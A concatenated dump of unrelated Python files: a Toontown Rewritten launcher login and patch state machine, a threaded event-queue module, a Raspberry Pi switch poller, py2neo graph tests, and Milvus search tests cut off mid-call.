'CheckQueue', 'Off'],
'CheckQueue': [
'LoginResponse', 'Off'],
'Patch': [
'GetCredentials', 'Off'],
'LaunchGame': [
'GetCredentials', 'Off']}
self.version = settings.Version
self.connection = None
self.gameserver = None
self.cookie = None
self.authToken = None
self.authBanner = None
self.appToken = None
self.queueToken = None
self.patcher = None
self.interface = None
self.credentials = None
self.dontClearMessage = False
return
def sendOutput(self, data):
self.output.put(data, block=True, timeout=0.5)
def start(self):
self.sendOutput((messagetypes.LAUNCHER_STATUS, ''))
self.request('CheckForUpdates')
def enterCheckForUpdates(self):
self.request('Patch')
return
def enterGetCredentials(self):
if self.dontClearMessage:
self.dontClearMessage = False
else:
self.sendOutput((messagetypes.LAUNCHER_STATUS, ''))
if self.credentials is None:
username, password = self.input.get(block=True, timeout=None)
self.credentials = (username, password)
else:
username, password = self.credentials
self.request('SubmitCredentials', username, password)
return
def enterSubmitCredentials(self, username, password):
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_Authing))
self.connection = httplib.HTTPSConnection(*settings.SSLConnection)
headers = {'Content-type': 'application/x-www-form-urlencoded'}
params = urlencode({'username': username.encode('utf8'),
'password': password.encode('utf8')})
self.connection.request('POST', settings.LoginPostLocation, params, headers)
self.request('LoginResponse')
def enterLoginResponse(self):
try:
response = self.connection.getresponse()
except httplib.BadStatusLine:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR006: %s' % localizer.ERR_AccServerDown))
self.credentials = None
self.request('GetCredentials')
else:
if response.status == httplib.SERVICE_UNAVAILABLE:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR006: %s' % localizer.ERR_AccServerDown))
self.credentials = None
self.request('GetCredentials')
if response.status != httplib.OK:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR002: %s' % localizer.ERR_Non200Resp % {'response': str(response.status)}))
self.credentials = None
self.request('GetCredentials')
try:
data = json.loads(response.read().decode('utf-8'))
except:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR001: %s' % localizer.ERR_JSONParseError))
print("json parse error in area 1")
self.request('Off')
success = data.get('success', 'false')
self.connection.close()
self.connection = None
if success == 'true':
self.cookie = data.get('cookie', 'NoCookieGiven')
self.gameserver = data.get('gameserver', 'NoServerGiven')
self.request('LaunchGame')
else:
if success == 'false':
self.sendOutput((messagetypes.LAUNCHER_ERROR, data.get('banner', localizer.ERR_InvalidLogin)))
self.credentials = None
self.request('GetCredentials')
self.sendOutput(messagetypes.LAUNCHER_CLEAR_PASSWORD)
else:
if success == 'partial':
self.authToken = data.get('responseToken', None)
self.authBanner = data.get('banner', '')
self.request('GetTFACode')
else:
if success == 'delayed':
eta = int(data.get('eta', 5))
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_Queue % eta))
self.queueToken = data.get('queueToken', None)
self.request('Delayed', eta)
return
def enterGetTFACode(self):
if self.authToken is None:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR005: %s' % localizer.ERR_TFAWithoutToken))
self.request('Off')
self.sendOutput((messagetypes.LAUNCHER_STATUS, ''))
self.sendOutput((messagetypes.LAUNCHER_REQUEST_TFA, self.authBanner))
self.appToken = self.input.get(block=True, timeout=None)
if self.appToken is None:
self.credentials = None
self.request('GetCredentials')
self.request('SubmitTFACode')
return
def enterSubmitTFACode(self):
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_Authing))
self.connection = httplib.HTTPSConnection(*settings.SSLConnection)
headers = {'Content-type': 'application/x-www-form-urlencoded'}
params = urlencode({'appToken': self.appToken,
'authToken': self.authToken})
self.connection.request('POST', settings.LoginPostLocation, params, headers)
self.request('LoginResponse')
def enterDelayed(self, timeDelay):
if self.queueToken is None:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR007: %s' % localizer.ERR_DelayWithoutToken))
self.request('Off')
time.sleep(max(timeDelay, 1))
self.request('CheckQueue')
return
def enterCheckQueue(self):
self.connection = httplib.HTTPSConnection(*settings.SSLConnection)
headers = {'Content-type': 'application/x-www-form-urlencoded'}
params = urlencode({'queueToken': self.queueToken})
self.connection.request('POST', settings.LoginPostLocation, params, headers)
self.request('LoginResponse')
def enterPatch(self):
from patcher import Patcher
self.patcher = threading.Thread(target=Patcher.Patch, name='Patcher-Thread', args=(self.__updateProgress, self.__updateFile))
self.patcher.daemon = True
self.patcher.start()
self.request('GetCredentials')
def __updateProgress(self, percentage):
if self.output.empty():
self.sendOutput((messagetypes.LAUNCHER_PROGRESS, percentage))
def __updateFile(self, fileCount):
#if self.output.empty():
self.sendOutput((messagetypes.LAUNCHER_STATUS, fileCount))
def exitPatch(self):
self.sendOutput((messagetypes.LAUNCHER_PROGRESS, -1))
def enterLaunchGame(self):
os.environ['TTR_PLAYCOOKIE'] = self.cookie
os.environ['TTR_GAMESERVER'] = self.gameserver
if sys.platform == 'win32':
game = subprocess.Popen('TTREngine', creationflags=134217728)
else:
modes = os.stat('TTREngine').st_mode
if not modes & stat.S_IXUSR:
os.chmod('TTREngine', modes | stat.S_IXUSR)
game = subprocess.Popen('./TTREngine')
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_PlayGameFarewell))
time.sleep(1)
self.sendOutput(messagetypes.LAUNCHER_HIDE)
while game.poll() is None:
time.sleep(1.5)
os.system("/app/bin/wmclass") #Sets the WM_CLASS of Toontown Rewritten so that DE can show icon
if game.returncode == 0:
self.sendOutput(messagetypes.LAUNCHER_CLEAR_PASSWORD)
self.sendOutput(messagetypes.LAUNCHER_SHOW)
self.sendOutput(messagetypes.LAUNCHER_ENABLE_CONTROLS)
self.credentials = None
self.dontClearMessage = True
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_PlayAgain))
time.sleep(1.5)
self.request('GetCredentials')
return
self.sendOutput(messagetypes.LAUNCHER_SHOW)
self.sendOutput(messagetypes.LAUNCHER_PLAY_RETRY)
if self.input.get(block=True, timeout=None):
self.request('GetCredentials')
else:
self.request('Off')
return
def enterOff(self):
if self.connection is not None:
self.connection.close()
self.sendOutput(messagetypes.LAUNCHER_EXIT)
return
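# A minimal wiring sketch (illustrative only, not the launcher's real entry point):
# a GUI thread would create the two queues described in the class docstring, hand
# them to TTRLauncher, and drive the state machine from a worker thread. The queue
# roles noted below are assumptions based on the code above.
def _example_launcher_wiring():
    import queue
    gui_to_launcher = queue.Queue()   # credentials / TFA codes flow in via self.input
    launcher_to_gui = queue.Queue()   # (messagetype, payload) tuples flow out via self.output
    launcher = TTRLauncher(gui_to_launcher, launcher_to_gui)
    worker = threading.Thread(target=launcher.start, name='main-thread', daemon=True)
    worker.start()
    return launcher, launcher_to_gui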
|
__init__.py
|
##########
##
## SPDX-License-Identifier: MIT
##
## Copyright (c) 2017-2022 James M. Putnam <putnamjm.design@gmail.com>
##
##########
##########
##
## events
##
##########
"""Manage retrograde events
See module gra-afch for display/RTC events.
See module retro for system events.
Classes:
Event
Functions:
dump(object, file)
dumps(object) -> string
load(file) -> object
loads(string) -> object
event()
find_event(module)
make_event(module, type_, arg)
register(module, fn)
send_event(ev)
Misc variables:
VERSION
"""
import json
import sys
from threading import Thread, Lock
from time import localtime, strftime, time, sleep
from datetime import datetime
##########
#
# event format:
#
# { "module": { "event" : arg } }
#
# module: event, retro, gra-afch, integration
# event: button, timer, alarm, ui-control, integration, exec
# arg: context-based
#
# sneak in a timestamp somehow?
#
class Event:
"""the event class
"""
VERSION = '0.0.3'
_conf_dict = None
_queue = None
_queue_lock = None
_modules_lock = None
_modules = None
# this gives us around one second event latency
_HIGH_WATER_MARK = 28
_LOW_WATER_MARK = 0
def _lock_module(self, module):
with self._modules_lock:
for lock_desc in self._modules:
module_, lock_, _ = lock_desc
if module == module_:
return lock_
assert False
return None
def register(self, module_, fn):
"""register a module event thread
create a per-module event thread and lock
and bind them to module.
the module event thread waits on the lock
by calling find_event until somebody does
a send_event with their tag.
there shouldn't be any events already on
queue for a unregistered module, if we want
to allow that we can grovel through the
queue and set the lock state accordingly
like find_event.
"""
with self._modules_lock:
lock_ = Lock()
lock_.acquire()
thread_ = Thread(target=fn)
self._modules.append((module_, lock_, thread_))
thread_.start()
def find_event(self, module):
"""find a module event
unless there are one or more events on
the queue for module, wait until
send_event releases the wait lock.
"""
def in_queue():
return next((x for x in self._queue if module in x), None)
def_ = None
lock_ = self._lock_module(module)
lock_.acquire()
with self._queue_lock:
def_ = in_queue()
assert def_
self._queue.remove(def_)
if in_queue() and lock_.locked():
lock_.release()
return def_
def send_event(self, ev):
"""push an event on the event queue
release the module event lock if
it is already locked.
module locks are only changed
with the queue lock held, so
this is safe.
"""
module_ = list(ev)[0]
type_ = ev[module_]
lock_ = self._lock_module(module_)
if len(self._queue) > self._HIGH_WATER_MARK:
if 'event' != type_:
while len(self._queue) > self._LOW_WATER_MARK:
sleep(0.0)
with self._queue_lock:
self._queue.append(ev)
if lock_.locked():
lock_.release()
def make_event(self, module, type_, arg):
"""find a module event
unless there are one or more events on
the queue for module, wait until
send_event releases the wait lock.
"""
fmt = '{{ "{}": {{ "{}": "{}" }} }}'
# print('make event: ', end='')
# print(fmt.format(module, type_, arg))
# print(datetime.now().strftime('%H:%M:%S:%f'))
self.send_event(json.loads(fmt.format(module, type_, arg)))
def exec_(self, op):
"""find a module event
unless there are one or more events on
the queue for module, wait until
send_event releases the wait lock.
"""
step = op['exec']
if 'repeat' in step:
def_ = step['repeat']
count_ = def_['count']
if isinstance(count_, bool):
while count_:
for op_ in def_['block']:
self.send_event(op_)
elif isinstance(count_, int):
for _ in range(count_):
for op_ in def_['block']:
self.send_event(op_)
else:
assert False
elif 'block' in step:
for op_ in step['block']:
self.send_event(op_)
else:
assert False
def config(self):
return self._conf_dict
def __init__(self, module):
"""create an event object
"""
def event_proc():
while True:
ev = self.find_event('event')
self.exec_(ev['event'])
self._conf_dict = []
with open(module.path(__file__, 'conf.json'), 'r') as file:
self._conf_dict = json.load(file)
self._queue_lock = Lock()
self._queue = []
self._modules_lock = Lock()
self._modules = []
self.register('event', event_proc)
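# A minimal usage sketch (illustrative only): register a handler thread for the
# "retro" module named in the event-format comment above, then push a button event
# through the queue. The handler body and the "short-press" argument are assumptions
# for this example, not values taken from conf.json.
def _example_retro_events(event_obj):
    def handler():
        while True:
            ev = event_obj.find_event('retro')  # blocks until send_event releases the lock
            print(ev['retro'])                  # e.g. {'button': 'short-press'}
    event_obj.register('retro', handler)
    # either build the documented { "module": { "event": arg } } payload yourself ...
    event_obj.send_event({'retro': {'button': 'short-press'}})
    # ... or let make_event format it from its pieces
    event_obj.make_event('retro', 'button', 'short-press')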
|
switch.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import threading
import RPi.GPIO as GPIO
DEBUG_MODE = False
SW_PIN = 20
#
E_EDGE_BIT = 0x01
R_EDGE_BIT = 0x02
F_EDGE_BIT = 0x04
#
L_PRESS_BIT = 0x01
L_PRESS_CNT_MAX = 30
#
POLLING_INT = 0.05
class Switch():
def __init__(self, PIN):
# Set GPIO pin input and pull-down
GPIO.setup(PIN, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
# Generate Thread and Flag
self.sw_event = threading.Event()
self.stop_event = threading.Event()
self.running_flag = threading.Event()
self.thread = threading.Thread(target = self.run)
# Initialize Variable
self.__pin = PIN
self.__status = False
self.__edgeFlag = 0x00
self.__longFlag = 0x00
self.__longPressCnt = 0
# Start
self.running_flag.set()
self.thread.start()
def getEdgeFlag(self):
return self.__edgeFlag
def clearEdgeFlag(self):
self.__edgeFlag = 0x00
def getLongFlag(self):
return self.__longFlag
def clearLongFlag(self):
self.__longFlag = 0x00
self.__longPressCnt = 0
def run(self):
while not self.stop_event.is_set():
self.running_flag.wait()
tmp_status = GPIO.input(self.__pin)
# Rising Edge
if tmp_status == True and self.__status == False:
self.__edgeFlag |= (E_EDGE_BIT | R_EDGE_BIT)
self.__longPressCnt = 0
self.sw_event.set()
# Falling Edge
elif tmp_status == False and self.__status == True:
self.__edgeFlag |= (E_EDGE_BIT | F_EDGE_BIT)
self.__longPressCnt = 0
self.sw_event.set()
# Continuous High
elif tmp_status == True and self.__status == True:
self.__longPressCnt += 1
if self.__longPressCnt == L_PRESS_CNT_MAX: # only first time
self.__longFlag |= (L_PRESS_BIT)
self.sw_event.set()
self.__longPressCnt = 0
            # Continuous Low
elif tmp_status == False and self.__status == False:
self.__longPressCnt = 0
self.__status = tmp_status # Update Switch Status
time.sleep(POLLING_INT)
        if DEBUG_MODE:
            print(" break run loop")
def stop(self):
        if DEBUG_MODE:
            print("Stop Thread")
self.stop_event.set()
self.thread.join()
def suspend(self):
self.running_flag.clear()
def resume(self):
self.running_flag.set()
def main_loop():
while True:
if s1.sw_event.is_set():
print "----------------------"
print "E: " + str(s1.getEdgeFlag() & E_EDGE_BIT)
print "R: " + str(s1.getEdgeFlag() & R_EDGE_BIT)
print "F: " + str(s1.getEdgeFlag() & F_EDGE_BIT)
print "L: " + str(s1.getLongFlag() & L_PRESS_BIT)
s1.clearEdgeFlag()
s1.clearLongFlag()
s1.sw_event.clear()
time.sleep(0.1)
if __name__ == '__main__':
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM) # Use BCM GPIO numbers
s1 = Switch(SW_PIN)
try:
main_loop()
except KeyboardInterrupt:
print "Keyboard Interrupt"
finally:
s1.stop()
GPIO.cleanup()
print "Good Bye!"
|
test_graph.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright 2011-2020, Nigel Small
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pytest import raises, skip, mark
from py2neo import Graph, Node, Relationship
def test_same_uri_gives_same_instance(graph):
uri = graph.service.uri
graph_1 = Graph(uri)
graph_2 = Graph(uri)
assert graph_1 is graph_2
def test_graph_len_returns_number_of_rels(graph):
size = len(graph)
statement = "MATCH ()-[r]->() RETURN COUNT(r)"
num_rels = graph.evaluate(statement)
assert size == num_rels
def test_graph_bool_returns_true(graph):
assert graph.__bool__()
assert graph.__nonzero__()
def test_graph_contains(graph):
node = Node()
graph.create(node)
assert node.graph is graph
def test_graph_is_not_equal_to_non_graph(graph):
graph = Graph()
assert graph != object()
def test_can_create_and_delete_node(graph):
a = Node()
graph.create(a)
assert isinstance(a, Node)
assert a.graph == graph
assert a.identity is not None
assert graph.exists(a)
graph.delete(a)
assert not graph.exists(a)
def test_can_create_and_delete_relationship(graph):
ab = Relationship(Node(), "KNOWS", Node())
graph.create(ab)
assert isinstance(ab, Relationship)
assert ab.graph == graph
assert ab.identity is not None
assert graph.exists(ab)
graph.delete(ab | ab.start_node | ab.end_node)
assert not graph.exists(ab)
def test_can_get_node_by_id_when_cached(graph):
node = Node()
graph.create(node)
assert node.identity in graph.node_cache
got = graph.nodes.get(node.identity)
assert got is node
def test_can_get_node_by_id_when_not_cached(graph):
node = Node()
graph.create(node)
graph.node_cache.clear()
assert node.identity not in graph.node_cache
got = graph.nodes.get(node.identity)
assert got.identity == node.identity
def test_get_non_existent_node_by_id(graph):
node = Node()
graph.create(node)
node_id = node.identity
graph.delete(node)
graph.node_cache.clear()
with raises(KeyError):
_ = graph.nodes[node_id]
assert graph.nodes.get(node_id) is None
def test_node_cache_is_thread_local(graph):
from threading import Thread
node = Node()
graph.create(node)
assert node.identity in graph.node_cache
other_cache_keys = []
def check_cache():
other_cache_keys.extend(graph.node_cache.keys())
thread = Thread(target=check_cache)
thread.start()
thread.join()
assert node.identity in graph.node_cache
assert node.identity not in other_cache_keys
def test_can_get_same_instance(graph):
graph_1 = Graph()
graph_2 = Graph()
assert graph_1 is graph_2
def test_create_single_empty_node(graph):
a = Node()
graph.create(a)
assert a.graph == graph
assert a.identity is not None
def test_get_node_by_id(graph):
a1 = Node(foo="bar")
graph.create(a1)
a2 = graph.nodes.get(a1.identity)
assert a1 == a2
def test_create_node_with_mixed_property_types(graph):
a = Node.cast({"number": 13, "foo": "bar", "true": False, "fish": "chips"})
graph.create(a)
assert len(a) == 4
assert a["fish"] == "chips"
assert a["foo"] == "bar"
assert a["number"] == 13
assert not a["true"]
def test_create_node_with_null_properties(graph):
a = Node.cast({"foo": "bar", "no-foo": None})
graph.create(a)
assert a["foo"] == "bar"
assert a["no-foo"] is None
@mark.skip
def test_bolt_connection_pool_usage_for_autocommit(graph):
connector = graph.service.connector
if "bolt" not in connector.scheme:
skip("Bolt tests are only valid for Bolt connectors")
pool = connector.pool
address = connector.connection_data["host"], connector.connection_data["port"]
n = len(pool.connections)
assert pool.in_use_connection_count(address) == 0
cursor = graph.run("RETURN 1")
assert 1 <= len(pool.connections) <= n + 1
assert pool.in_use_connection_count(address) in {0, 1}
n = len(pool.connections)
cursor.summary()
assert len(pool.connections) == n
assert pool.in_use_connection_count(address) == 0
@mark.skip
def test_bolt_connection_reuse_for_autocommit(graph):
connector = graph.service.connector
if "bolt" not in connector.scheme:
skip("Bolt tests are only valid for Bolt connectors")
pool = connector.pool
address = connector.connection_data["host"], connector.connection_data["port"]
n = len(pool.connections)
assert pool.in_use_connection_count(address) == 0
cursor = graph.run("RETURN 1")
assert 1 <= len(pool.connections) <= n + 1
assert pool.in_use_connection_count(address) in {0, 1}
n = len(pool.connections)
cursor.summary()
assert len(pool.connections) == n
assert pool.in_use_connection_count(address) == 0
cursor = graph.run("RETURN 1")
assert len(pool.connections) == n
assert pool.in_use_connection_count(address) in {0, 1}
cursor.summary()
assert len(pool.connections) == n
assert pool.in_use_connection_count(address) == 0
@mark.skip
def test_bolt_connection_pool_usage_for_begin_commit(graph):
connector = graph.service.connector
if "bolt" not in connector.scheme:
skip("Bolt tests are only valid for Bolt connectors")
pool = connector.pool
address = connector.connection_data["host"], connector.connection_data["port"]
n = len(pool.connections)
assert pool.in_use_connection_count(address) == 0
tx = graph.begin()
assert 1 <= len(pool.connections[address]) <= n + 1
assert pool.in_use_connection_count(address) == 1
n = len(pool.connections)
tx.commit()
assert len(pool.connections) == n
assert pool.in_use_connection_count(address) == 0
@mark.skip
def test_bolt_connection_pool_usage_for_begin_rollback(graph):
connector = graph.service.connector
if "bolt" not in connector.scheme:
skip("Bolt tests are only valid for Bolt connectors")
pool = connector.pool
address = connector.connection_data["host"], connector.connection_data["port"]
n = len(pool.connections)
assert pool.in_use_connection_count(address) == 0
tx = graph.begin()
assert 1 <= len(pool.connections) <= n + 1
assert pool.in_use_connection_count(address) == 1
n = len(pool.connections)
tx.rollback()
assert len(pool.connections) == n
assert pool.in_use_connection_count(address) == 0
|
test_search_20.py
|
import pytest
from time import sleep
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from utils.utils import *
from common.constants import *
prefix = "search_collection"
search_num = 10
max_dim = ct.max_dim
epsilon = ct.epsilon
gracefulTime = ct.gracefulTime
default_nb = ct.default_nb
default_nb_medium = ct.default_nb_medium
default_nq = ct.default_nq
default_dim = ct.default_dim
default_limit = ct.default_limit
default_search_exp = "int64 >= 0"
default_search_field = ct.default_float_vec_field_name
default_search_params = ct.default_search_params
default_int64_field_name = ct.default_int64_field_name
default_float_field_name = ct.default_float_field_name
default_bool_field_name = ct.default_bool_field_name
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
uid = "test_search"
nq = 1
epsilon = 0.001
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
search_param = {"nprobe": 1}
entity = gen_entities(1, is_normal=True)
entities = gen_entities(default_nb, is_normal=True)
raw_vectors, binary_entities = gen_binary_entities(default_nb)
default_query, _ = gen_search_vectors_params(field_name, entities, default_top_k, nq)
# default_binary_query, _ = gen_search_vectors_params(binary_field_name, binary_entities, default_top_k, nq)
class TestCollectionSearchInvalid(TestcaseBase):
""" Test case of search interface """
@pytest.fixture(scope="function", params=ct.get_invalid_vectors)
def get_invalid_vectors(self, request):
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_fields_type(self, request):
if isinstance(request.param, str):
pytest.skip("string is valid type for field")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_fields_value(self, request):
if not isinstance(request.param, str):
pytest.skip("field value only support string")
if request.param == "":
pytest.skip("empty field is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_metric_type(self, request):
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_ints)
def get_invalid_limit(self, request):
if isinstance(request.param, int) and request.param >= 0:
pytest.skip("positive int is valid type for limit")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_expr_type(self, request):
if isinstance(request.param, str):
pytest.skip("string is valid type for expr")
if request.param is None:
pytest.skip("None is valid for expr")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_expr_value(self, request):
if not isinstance(request.param, str):
pytest.skip("expression value only support string")
if request.param == "":
pytest.skip("empty field is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_partition(self, request):
if request.param == []:
pytest.skip("empty is valid for partition")
if request.param is None:
pytest.skip("None is valid for partition")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_output_fields(self, request):
if request.param == []:
pytest.skip("empty is valid for output_fields")
if request.param is None:
pytest.skip("None is valid for output_fields")
yield request.param
"""
******************************************************************
# The followings are invalid cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_connection(self):
"""
target: test search without connection
method: create and delete connection, then search
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. remove connection
log.info("test_search_no_connection: removing connection")
self.connection_wrap.remove_connection(alias='default')
log.info("test_search_no_connection: removed connection")
# 3. search without connection
log.info("test_search_no_connection: searching without connection")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "should create connect first"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_collection(self):
"""
        target: test searching a collection that does not exist
method: 1. create collection
2. drop collection
3. search the dropped collection
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. Drop collection
collection_w.drop()
# 3. Search without collection
log.info("test_search_no_collection: Searching without collection ")
collection_w.search(vectors, default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection %s doesn't exist!" % collection_w.name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_missing(self):
"""
target: test search with incomplete parameters
method: search with incomplete parameters
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. search collection with missing parameters
log.info("test_search_param_missing: Searching collection %s "
"with missing parameters" % collection_w.name)
try:
collection_w.search()
except TypeError as e:
assert "missing 4 required positional arguments: 'data', " \
"'anns_field', 'param', and 'limit'" in str(e)
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_vectors(self, get_invalid_vectors):
"""
target: test search with invalid parameter values
method: search with invalid data
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_vectors = get_invalid_vectors
log.info("test_search_param_invalid_vectors: searching with "
"invalid vectors: {}".format(invalid_vectors))
collection_w.search(invalid_vectors, default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`search_data` value {} is illegal".format(invalid_vectors)})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_dim(self):
"""
target: test search with invalid parameter values
method: search with invalid dim
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search with invalid dim
log.info("test_search_param_invalid_dim: searching with invalid dim")
wrong_dim = 129
vectors = [[random.random() for _ in range(wrong_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "The dimension of query entities "
"is different from schema"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_field_type(self, get_invalid_fields_type):
"""
target: test search with invalid parameter type
method: search with invalid field type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_search_field = get_invalid_fields_type
log.info("test_search_param_invalid_field_type: searching with "
"invalid field: %s" % invalid_search_field)
collection_w.search(vectors[:default_nq], invalid_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`anns_field` value {} is illegal".format(invalid_search_field)})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_field_value(self, get_invalid_fields_value):
"""
target: test search with invalid parameter values
method: search with invalid field value
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_search_field = get_invalid_fields_value
log.info("test_search_param_invalid_field_value: searching with "
"invalid field: %s" % invalid_search_field)
collection_w.search(vectors[:default_nq], invalid_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Field %s doesn't exist in schema"
% invalid_search_field})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_metric_type(self, get_invalid_metric_type):
"""
target: test search with invalid parameter values
method: search with invalid metric type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, 10)[0]
# 2. search with invalid metric_type
log.info("test_search_param_invalid_metric_type: searching with invalid metric_type")
invalid_metric = get_invalid_metric_type
search_params = {"metric_type": invalid_metric, "params": {"nprobe": 10}}
collection_w.search(vectors[:default_nq], default_search_field, search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "metric type not found"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_invalid_params_type(self, index, params):
"""
target: test search with invalid search params
method: test search with invalid params type
expected: raise exception and report the error
"""
if index == "FLAT":
pytest.skip("skip in FLAT index")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
is_index=True)[0:4]
# 2. create index and load
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search
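        # the helper below (name kept as spelled in common_func) is assumed to yield
        # dicts of {"index_type": ..., "search_params": ...} holding out-of-range values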
invalid_search_params = cf.gen_invaild_search_params_type()
message = "Search params check failed"
for invalid_search_param in invalid_search_params:
if index == invalid_search_param["index_type"]:
search_params = {"metric_type": "L2", "params": invalid_search_param["search_params"]}
collection_w.search(vectors[:default_nq], default_search_field,
search_params, default_limit,
default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 0,
"err_msg": message})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_limit_type(self, get_invalid_limit):
"""
target: test search with invalid limit type
method: search with invalid limit type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_limit = get_invalid_limit
log.info("test_search_param_invalid_limit_type: searching with "
"invalid limit: %s" % invalid_limit)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
invalid_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`limit` value %s is illegal" % invalid_limit})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("limit", [0, 16385])
def test_search_param_invalid_limit_value(self, limit):
"""
target: test search with invalid limit value
method: search with invalid limit: 0 and maximum
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid limit (topK)
log.info("test_search_param_invalid_limit: searching with "
"invalid limit (topK) = %s" % limit)
err_msg = "limit %d is too large!" % limit
if limit == 0:
err_msg = "`limit` value 0 is illegal"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_expr_type(self, get_invalid_expr_type):
"""
target: test search with invalid parameter type
method: search with invalid search expressions
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2 search with invalid expr
invalid_search_expr = get_invalid_expr_type
log.info("test_search_param_invalid_expr_type: searching with "
"invalid expr: {}".format(invalid_search_expr))
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, invalid_search_expr,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "The type of expr must be string ,"
"but {} is given".format(type(invalid_search_expr))})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_expr_value(self, get_invalid_expr_value):
"""
target: test search with invalid parameter values
method: search with invalid search expressions
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2 search with invalid expr
invalid_search_expr = get_invalid_expr_value
log.info("test_search_param_invalid_expr_value: searching with "
"invalid expr: %s" % invalid_search_expr)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, invalid_search_expr,
